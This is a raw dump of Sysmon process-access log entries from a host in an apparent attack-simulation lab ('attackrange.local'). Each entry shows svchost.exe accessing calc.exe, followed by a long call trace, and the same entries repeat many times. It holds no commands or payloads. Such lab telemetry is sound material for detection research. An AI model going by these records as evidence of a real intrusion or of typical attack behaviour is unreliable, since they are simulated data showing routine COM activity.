22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360136Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360135Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360134Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360133Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360132Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360131Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360130Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360129Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360128Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360127Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360126Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360125Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360124Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360123Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360122Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360121Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360120Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360119Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360118Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360117Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360116Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.562{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9d03-000000001100}956C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360115Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 